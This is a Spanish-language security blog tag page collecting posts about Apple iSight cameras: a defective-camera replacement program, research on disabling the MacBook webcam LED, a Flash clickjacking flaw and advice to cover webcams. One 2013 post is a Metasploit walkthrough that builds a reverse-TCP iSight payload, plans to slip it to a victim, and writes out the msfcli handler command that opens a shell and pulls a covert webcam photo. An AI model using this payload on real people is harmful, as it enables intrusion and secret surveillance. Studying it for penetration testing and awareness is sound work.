Menú principal

Mostrando entradas con la etiqueta iSight. Mostrar todas las entradas
Mostrando entradas con la etiqueta iSight. Mostrar todas las entradas

lunes, 24 de agosto de 2015

Apple reemplazará iSight en algunos iPhone 6 Plus

Esta misma semana Apple ha lanzado un programa de reemplazado de cámaras iSight que afectan a diferentes tiradas de los modelos iPhone 6 Plus vendidos entre Septiembre de 2014 (momento de su lanzamiento) y Enero de 2015, que habrían salido defectuosas. Los teléfonos que cuentan con esas versiones de iSight realizan fotos que no salen con la nitidez y calidad a las que los usuarios de iPhone están acostumbrados. Las quejas sobre esto han sido muchas en los foros de Apple, y al final la compañía ha optado por abrir el programa de reemplazo.

En la siguiente página web de Apple tienes un buscador donde puedes poner tu número de serie - solo para dispositivos iPhone 6 Plus. Una vez introducido, se podrá saber si tu terminal está afectado, y si es así, deberás llevarlo a un tienda Apple Store.

Figura 1: Web para localizar si tu terminal tiene una cámara iSight defectuosa

Si tienes que llevar el iPhone 6 Plus a reparar, sigue las instrucciones para hacer una copia de seguridad antes de llevarlo a la tienda, no vaya a ser haya algún problema y pierdas los datos.

jueves, 19 de diciembre de 2013

iSeeYou: Activar la webcam de MacBook e iMac sin LED

El número de muestras de malware con capacidad para acceder a la webcam en Mac OS X y grabar lo que está pasando sin consentimiento del usuario hoy en día es muy alto. No es una función que sea para nada compleja a la hora de programar para los creadores de malware, por eso muchos expertos de seguridad llevan tapada la webcam para evitar desagradables situaciones. En los equipos que vende la compañía Apple, las cámaras iSight vienen con un dispositivo de seguridad que alerta cuando la cámara se ha encendido, activándose una luz que avisa de la situación.

Sin embargo, esa medida de seguridad de alerta no evita que ningún malware active la cámara y grabe, solo te avisaría de esa situación - si no estás mirando o estás durmiendo será difícil que la veas - e incluso aún así no es infalible. Ya hace bastante tiempo se hizo una prueba de concepto en el que con algunos equipos de Apple era posible tomar fotografías cada cierto espacio de tiempo - como una cámara de vídeo vigilancia - y conseguir tener una película hecha foto a foto sin que se hubiera encendido la luz.

Figura 1: Paper "iSeeYou: Disabling the MacBook Webcam Indicator LED"


Ahora los investigadores Matthew Brocker y Stephen Checkoway de la Johns Hopkins University han publicado un paper titulado "iSeeYou: Disabling the MacBook Webcam Indicator LED" en el que demuestran que reprogramando el firmware de iSight en los equipos MacBook Pro e iMac anteriores al año 2008 es posible activar la webcam sin que se active la luz LED de alerta de grabación.

Figura 2: Estructura de conexiones de iSight y el indicador LED

El diseño de iSight y el LED de alerta está pensado para que cuando la Webcam está activada el LED también lo esté porque comparten la señal electríca, pero hay un pequeño truco que se puede hacer. La idea es que como el LED está conectado al PIN de StandBy la Webcam de iSight la luz se apaga cuando el equipo entra en modo de suspensión, y cuando regresa de este modo se vuelve a activar. Los investigadores reprogramaron el firmware para que iSight ignorase el la señal de suspensión, y mandaron la señal de suspensión por el USB, lo que hace que el PIN de StandBy afectase solo a la luz de alerta del LED. El resultado es el que puede verse en la imagen siguiente, un MacBook Pro con iSight activado y el LED apagado.

Figura 3: MacBook con iSight activado y sin LED de alerta

Lo más preocupante de es este trabajo no es la demostración de encender la Webcam sin encender el LED en equipos tan antiguos - que además se puede hacer sin permisos de administrador y sin necesidad de acceso físico al equipo -, sino que al ser una medida basada en alerta, si algún atacante es capaz de encontrar un bug similar en modelos más actuales, sería posible hacer algo similar en los MacBook que tiene casi todo el mundo hoy en día. Nuestra recomendación es sencilla. Si puedes, tapa la webcam.

miércoles, 18 de septiembre de 2013

Ponte Sexy: Payload iSight para Metasploit Framework

Metasploit Framework permite realizar acciones interesantes sobre equipos con sistema operativo OS X. De hecho hemos ido recopilando artículos sobre cómo sacar partido a exploits para OS X que se van añadiendo al framework. Entre ellos la prueba de concepto sobre el bug descubierto en sudo, en otros casos con Java, sus fallos y cómo con el framework eramos capaces de explotar y lograr acceso remoto a una Mac OS X sin actualizar o cómo preparar ataques con portales cautivos en Mac OS X Lion.

Hoy vamos a hablar de cómo generar un pequeño payload el cual creará una sesión, inversa o directa, con una shell para descargarnos la fotografía que se realizará con la webcam iSight. En otras palabras, crearemos un binario el cual al ser ejecutado por la víctima realizará una fotografía con la cámara que viene en los Mac y se descargará hacia el equipo del atacante. 

PoC: Preparando el binario

Para preparar el binario simplemente utilizaremos la herramienta msfpayload, la cual nos proporciona una fuente de opciones para generar payloads en (casi) cualquier formato. La idea de hoy es generar un binario e intentar colárselo a la víctima para que lo ejecute en el terminal de un Mac OS X. Otra opción válida sería realizar una pequeña aplicación que llame internamente a dicho binario, pero eso ya es cuestión de la imaginación de cada usuario.

Buscaremos a través de msfconsole la ruta de Metasploit donde se encuentra el payload de isight para Mac OS X. Utilizando el comando search podemos realizar la búsqueda por patrones.

Figura 1: Buscando payload isight

La sintaxis de msfpayload es sencilla, indicaremos el payload que se quiere utilizar, el puerto y dirección IP a la que el payload se debe conectar. Utilizaremos la conexión inversa en el payload, para que cuando se ejecute en la máquina remota, éste sepa "volver a casa" con la configuración de LHOST y LPORT requerida en la generación del binario. En la siguiente imagen se puede visualizar la acción de generación del binario.

Figura 2: Generando payload

Una vez generado el payload se tiene que "colar" a la víctima para que al ejecutarlo recibamos la imagen. Para poder recibir la imagen debemos configurar el handler en Metasploit, para ello utilizamos directamente la herramienta msfcli del framework. La sintaxis es sencilla msfcli exploit/multi/handler LHOST= LPORT= PAYLOAD=osx/x86/isight/reverse_tcp E. Es importante que no se nos olvide la E del final de la instrucción. 

Figura 3:Creación de shell y descarga de fotografía

Cuando la víctima ejecuta se crea una sesión de shell donde se obtiene la imagen y se descarga la fotografía al equipo del atacante. Ahora no hay excusa para tapar tu webcam de tu Mac y evita que tu foto sea pública. Si te parece interesante  y quieres aprender mucho más de estas técnicas no dudes en consultar el libro Metasploit para Pentesters de 0xWord de nuestro compañero Pablo González.

lunes, 12 de agosto de 2013

¿Se debe tapar la webcam de un MacBook por seguridad?

Tapar la webcam de la computadora para no ser grabado por un malware es un tema recurrente en seguridad personal. Que el malware tiene esta capacidad ya lo hemos visto en muchas ocasiones pero la pregunta que se hacen muchos es si es necesario hacerlo en equipos Mac, ya que la webcam iSight enciende una luz cada vez que está encendida. ¿Es suficiente? Lo cierto es que muchos pensamos que no, ya que cuando un programa configura el modo fotografía con la webcam la luz no llega a encenderse. Además, podría suceder que la luz estuviera rota y la cámara estuviera funcionando sin que lo supiéramos. Por eso, la mayoría de los expertos de seguridad que usan Mac también tapan la cámara.

Como muestra de esto, os traemos una foto curiosa que publicó el famoso experto de seguridad Moxie Marlinspike en su Twitter personal y que puedes consultar online. En ella se ve que utiliza un MacBook Pro, y en la cámara se puede apreciar la medida de seguridad que ha aplicado.

Figura 1: Equipo MacBook de Moxie con la Webcam tapada

Al final, casos de grabaciones con equipos Mac ya hemos tenido casos, como el de técnico que espiaba a sus clientes, e incluso hemos visto a criminales espiar a sus vecinos. Nuestra recomendación es: Tapa la webcam si no la estás usando.

viernes, 21 de octubre de 2011

Clickjacking en Adobe Flash deja que te graben en vídeo

Adobe Flash Player Settings Manager
No solo está de moda Adobe Flash por el caso del troyano OSX/FlashBack, sino que también por un caso curioso de clickjacking que permite a una página web activar la cámara del visitante y grabarle.

Adobe ya ha anunciado que va a solucionar este problema, sobre todo después del ruido que ha levantado el vídeo de la demostración presentado por Feross, el descubridor de la vulnerabilidad. 

El fallo se explota mediante un ataque de clickjacking en una página maliciosa. En esa página se carga, dentro de un iframe transparente la página de Adobe Flash Player Setting Manager, algo heredado de Macromedia, en la que se puede configurar la activación de la cámara. 

Por supuesto, los ataques de clickjacking se conocen hace tiempo, y es por eso que hay tecnologías para detectar que se ha metido dentro un frame la página web, y Adobe también aplica esas medidas. Sin embargo, la gracia del ataque presentado por Feross es que lo que mete en el frame no es la página web en sí, sino el archivo swf que utiliza Adobe en ella, para conseguir lo que se puede ver en el vídeo.


Adobe ya ha dicho que va a arreglar esta situación, y esperemos que se bastante pronto, ya que la página está hosteada por ellos, así que no debería suponer más que un parcheo de sus servidores. Si quieres probar si aún está activa la vulnerabilidad en tu sistema, puedes probar la demo que ha puesto online, en la que tienes que hacer clic en clic me hasta que se active la Webcam. La prueba funciona en Firefox y Safari.

La noticia ha salido asociada a Mac OS X, y es cierto que los usuarios de Mac se ven afectados por esta vulnerabilidad, pero también los usuarios de Windows. En el caso de Mac iSight además se encenderá, lo que serviría de alerta, pero por si acoso, recuerda que los más paranóicos tapamos la webcam y el micrófono para evitar situaciones embarazosas con malware o técnicos mirones.

Entrada destacada

Proteger tu cuenta de Google y de Gmail con Latch Cloud TOTP #Latch #Gmail #Google

La semana pasada se liberó la nueva versión de Latch y nuestro compañero Chema Alonso hizo un repaso de todo ello en su artículo Latch...

Otras historias relacionadas

Entradas populares